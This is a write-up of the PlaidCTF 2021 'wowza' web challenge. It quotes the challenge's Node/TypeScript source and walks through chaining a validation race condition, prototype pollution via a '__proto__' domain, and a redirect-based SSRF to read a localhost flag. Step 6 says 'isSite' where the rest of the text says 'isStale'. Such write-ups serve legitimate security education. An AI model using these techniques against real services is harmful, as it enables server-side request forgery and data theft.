PlaidCTF 2021 - wowza - web (350pt)

Once the pinnacle of the 20th century tech industry, now a defunct relic of the past. Meet the people behind the rise and fall of a search engine giant in the new documentary, Wowza!

wowza.tgz
<link to wowza service>

This was a fun web challenge in PlaidCTF that used a neat combination of vulnerabilities.

We get source code to the entire application. The Wowza server gives us a private instance of the application which we have access to for 15 minutes to conduct our attack and get the flag.

  • The application consists of 2 services with the following functionality:
    • search-console
      • Add a domain
      • verify ownership of the domain by adding a randomly generated TXT record to it
      • once the domain is verified, you can index it
      • indexing runs a scrape on the site, where it follows every link on the website and indexes things with pagerank. yes, they literally implemented pagerank for this challenge
    • site-search
      • search bar with 2 inputs, domain and keyword
      • searches an indexed domain from search-console
      • sends a POST request with search data to the API running on search-console

Looking through source code, it seems that our goal is to get SSRF on site-search

    // Let's just call a spade a spade, shall we?
    const ssrfTarget = express();
    ssrfTarget.get("/flag.txt", (req, res) => {
        if (req.hostname !== "localhost") {
            return res.status(401).send(">:(");
        }

        res.send(FLAG);
    });
    ssrfTarget.listen(1337, "127.0.0.1");

So of course, we look at SSRF targets in the site-search source code. This is the only relevant location:

export const getResults = async (domain: string, query: string) => {
    if (cache[domain]?.[query]) {
        return cache[domain][query];
    }

    const tokens = query
        .split(/\s+/g)
        .map((x) => x.replace(/[^a-zA-Z0-9]+/g, ""))
        .filter((x) => x !== "");

    const results = await fetch(new URL("/search", consoleUrl), {
        headers: {
            "Content-Type": "application/json",
        },
        method: "POST",
        body: JSON.stringify({ domain, query: tokens }),
    });

    const searchResults: Result[] = await results.json();
    const patched = await Promise.all(
        searchResults
            .map(async (result) => {
                if (result.isStale) {
                    const pageUrl = new URL(result.path, "http://" + domain);
                    try {
                        const refetch = await fetch(pageUrl);
                        const body = await refetch.text();
                        result.description = getBody(body).join(" ").trim();
                    } catch (e) {
                        // pass
                    }
                }

                return result;
            })
    );

    const domainCache = cache[domain] ?? {};
    domainCache[query] = patched;
    cache[domain] = domainCache;

    return patched;
}

The key here is @ Line 26, the site-search service will attempt to re-fetch a page if it has the isStale property set. This fetch() call will follow redirects. So if we can get to this block of code, and we change our page to 302-redirect to http://localhost:1337, it will trigger an SSRF and grab the flag instead :)

Now the problem comes down to figuring out how to set the isStale flag on a search result -- because searching through the codebase, isStale is nowhere else to be seen! Nothing ever writes to the isStale property, and in fact, a close examination of the /search endpoint reveals that it will only ever return the properties name, path, description on a search result. So, how can we set it?

Something that stuck out to me as being fishy in the above block of code was the cache object and the block of code to update it at the bottom. This can be exploited with Prototype Pollution. If we set our domain to __proto__ and our query to isStale, it will end up writing isStale to the proto of the object class, which means that any newly created object will have isStale set! Yes, JS is bizarre.

I thought we were done with the problem here, but there was another issue, the /search endpoint would return an erroneous object when you passed a domain of __proto__, so we couldn't reach the block of code where the domainCache gets update. This was because the search service would actually check to see if the domain was a validated domain. So, we somehow had to get the domain __proto__ to be validated.

After close inspection of the code, I finally noticed that the validateSite function in search-console was doing something interesting:

export const validateSite = async (username: string, domain: string, validation_code: string) => {
    await transaction(async () => {
        const pendingSitePromise = query<PendingSite>`
                SELECT * FROM pending_site
                WHERE domain = ${domain}
                    AND username = ${username}
                    AND validation_code = ${validation_code};`
            .then((validationResults) => {
                if (validationResults.length !== 1) {
                    throw new SafeError(401, "Invalid validation code");
                };
            })
            .then(() => query`
                DELETE FROM pending_site
                WHERE domain = ${domain};
            `);

        const siteInsertPromise = query`
            INSERT INTO site (domain, pages, indices)
            VALUES (${domain}, ${JSON.stringify([])}, ${JSON.stringify([])});
        `;

        const ownershipInsertPromise = query`
            INSERT INTO user_site_ownership (username, domain)
            VALUES (${username}, ${domain});
        `;

        const results = await Promise.allSettled([pendingSitePromise, siteInsertPromise, ownershipInsertPromise]);
        assertAllSettled(results);
    })
}

If you notice, it calls Promise.allSettled() on these 3 queries. Surely, it can't be executing them simultaneously, right? That did indeed turn out to be the case. If you sent enough requests to validate a domain, you would encounter a race condition where it would insert the domain into the site table without it actually needing to be validated.

So our final exploit was as follows:

  1. add a domain that we control, e.g. evil.com
  2. add the domain __proto__
  3. validate both using the race condition (just spam requests to /validate/)
  4. add an index.html file to our domain which contains a link to /payload.html
  5. trigger a scrape for evil.com
  6. in site-search search for __proto__, isSite to trigger the prototype pollution
  7. in our webserver, make /payload.html 302 redirect to http://localhost:1337
  8. in site-search search for evil.com, keyword, where keyword is some keyword that was inside the original payload.html file.
  9. get flag =)

TL;DR

  • bug 1: can validate domains with a race condition
  • bug 2: can use prototype pollution to write isStale into any returned search result
  • bug 3: fetch() follows redirects, abuse for SSRF